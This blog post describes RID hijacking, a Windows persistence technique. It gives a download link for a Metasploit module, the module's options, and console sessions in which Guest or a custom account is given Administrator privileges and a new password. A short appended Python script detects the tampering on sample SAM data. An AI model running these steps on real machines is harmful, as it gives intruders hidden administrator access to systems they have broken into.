RID Hijacking: Maintaining Access on Windows Machines
Author: stranger   2018-10-10 14:56 (Wednesday)

The RID Hijacking hook, which applies to all Windows versions, allows setting desired privileges on an existing account in a stealthy manner by modifying some security attributes of the user.
By using only OS resources, it is possible to replace a user's RID before the access token is created. To automate the attack, a Metasploit module was developed. It requires a meterpreter session on the victim.
Overview
This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the target machine.
Taking advantage of some Windows local user management integrity issues, this module will allow authenticating with the credentials of one known account (such as the GUEST account) while using the privileges of another existing account (such as the ADMINISTRATOR account), even if the spoofed account is disabled.
By using a meterpreter session on a Windows host, the module will try to obtain SYSTEM privileges if required, and will modify some attributes to hijack the privileges of an existing local account and assign them to another one.
Vulnerable software
This module has been tested on:
Windows XP, 2003 (32-bit)
Windows 8.1 Professional (64-bit)
Windows 10 (64-bit)
Windows Server 2012 (64-bit)
This module has not been tested on, but may work on:
Other versions of Windows (x86 and x64).
Download
git clone https://github.com/r4wd3r/RID-Hijacking.git
Usage
Options
GETSYSTEM: Try to obtain SYSTEM privileges on the victim. Default: false.
GUEST_ACCOUNT: Use the GUEST built-in account as the target of the privileges to be hijacked. Sets this account as the hijacker. Default: false.
SESSION: The session to run this module on. Default: none.
USERNAME: Sets the user account (SAM account name) on the victim host that will be the target of the privileges to be hijacked. Sets this account as the hijacker. If the GUEST_ACCOUNT option is set to true, this parameter is ignored even when defined. Default: none.
PASSWORD: Sets or changes the password of the account defined as the target of the privileges to be hijacked, either the GUEST account or the user account set in the USERNAME option. Sets the password of the hijacker account. Default: none.
RID: Specifies the decimal RID number of the victim account. This number should be the RID of an existing account on the target host, regardless of whether it is disabled (e.g. the Administrator built-in account has RID 500). Sets the RID owned by the account to be hijacked. Default: 500.
Scenarios
Assign Administrator privileges to the Guest built-in account.
msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set SESSION 1
SESSION => 1
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[*] Account is disabled, activating...
[+] Target account enabled
[*] Overwriting RID
[+] The RID 500 is set to the account Invitado with original RID 501
[*] Post module execution completed
Result after logging in with the Guest account.

Assign Administrator privileges to a local custom account.
msf post(rid_hijack) > set GETSYSTEM true
GETSYSTEM => true
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 500 is set to the account testuser with original RID 1002
[*] Post module execution completed
Result after logging in with the testuser account.

Assign custom privileges to the Guest built-in account and set a new password for Guest.
msf post(rid_hijack) > set GUEST_ACCOUNT true
GUEST_ACCOUNT => true
msf post(rid_hijack) > set RID 1002
RID => 1002
msf post(rid_hijack) > set PASSWORD Password.1
PASSWORD => Password.1
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Target account: Guest Account
[*] Target account username: Invitado
[*] Target account RID: 501
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account Invitado with original RID 501
[*] Setting Invitado password to Password.1
[*] Post module execution completed
Assign custom privileges to a custom account and set a new password for the custom account.
msf post(rid_hijack) > set GUEST_ACCOUNT false
GUEST_ACCOUNT => false
msf post(rid_hijack) > set USERNAME testuser
USERNAME => testuser
msf post(rid_hijack) > set PASSWORD Password.2
PASSWORD => Password.2
msf post(rid_hijack) > run

[*] Checking for SYSTEM privileges on session
[+] Session is already running with SYSTEM privileges
[*] Target OS: Windows 8.1 (Build 9600).
[*] Checking users...
[+] Found testuser account!
[*] Target account username: testuser
[*] Target account RID: 1002
[+] Target account is already enabled
[*] Overwriting RID
[+] The RID 1002 is set to the account testuser with original RID 1002
[*] Setting testuser password to Password.2
[*] Post module execution completed
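The overview above says the module works by overwriting the RID stored in the SAM user entry, and the scenario output shows the symptom ("The RID 500 is set to the account Invitado with original RID 501"). The following added example, which is not part of the original post or of the RID-Hijacking project, is a defender's audit that flags this condition in an offline copy of the SAM hive: it assumes each user subkey under SAM\Domains\Account\Users is named by the hex RID, that the F value holds the RID as a little-endian DWORD at offset 0x30 and the account-control bits as a WORD at offset 0x38, and uses constructed sample F blobs instead of a real hive.

```python
import struct

# Field offsets inside the SAM user "F" value (assumed layout, see lead-in).
F_RID_OFFSET = 0x30   # RID the token will be built from; this is what RID hijacking overwrites
F_ACB_OFFSET = 0x38   # account control bits
ACB_DISABLED = 0x0001
ACB_NORMAL = 0x0010

def parse_f_value(f: bytes):
    """Return (rid, acb_flags) from an F value blob."""
    if len(f) < F_ACB_OFFSET + 2:
        raise ValueError("F value too short")
    rid = struct.unpack_from("<I", f, F_RID_OFFSET)[0]
    acb = struct.unpack_from("<H", f, F_ACB_OFFSET)[0]
    return rid, acb

def audit_sam_users(users):
    """users: mapping of Users subkey name (hex RID, e.g. '000001F5') -> F value bytes.
    A healthy SAM has the same RID in the key name and inside F; any mismatch
    means the account will receive another account's privileges at logon."""
    findings = []
    for key_name, f in users.items():
        key_rid = int(key_name, 16)
        rid, acb = parse_f_value(f)
        if rid != key_rid:
            findings.append({
                "key_rid": key_rid,
                "embedded_rid": rid,
                "disabled": bool(acb & ACB_DISABLED),
            })
    return findings

def make_f(rid, acb):
    """Build a constructed minimal F blob (zeros except the two fields inspected)."""
    f = bytearray(0x50)
    struct.pack_into("<I", f, F_RID_OFFSET, rid)
    struct.pack_into("<H", f, F_ACB_OFFSET, acb)
    return bytes(f)

# Constructed sample hive state mirroring the first scenario above:
SAMPLE_USERS = {
    "000001F4": make_f(500, ACB_NORMAL | ACB_DISABLED),  # Administrator, disabled, untouched
    "000001F5": make_f(500, ACB_NORMAL),                 # Guest key 501 but F says 500: hijacked
    "000003EA": make_f(1002, ACB_NORMAL),                # testuser, untouched
}

if __name__ == "__main__":
    for finding in audit_sam_users(SAMPLE_USERS):
        print("RID mismatch:", finding)
```

Run against a real system the same logic can be applied to the F values exported from HKLM\SAM (which requires SYSTEM) or carved from a forensic image.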
Article URL: http://biocyborg.cn/RIDhijack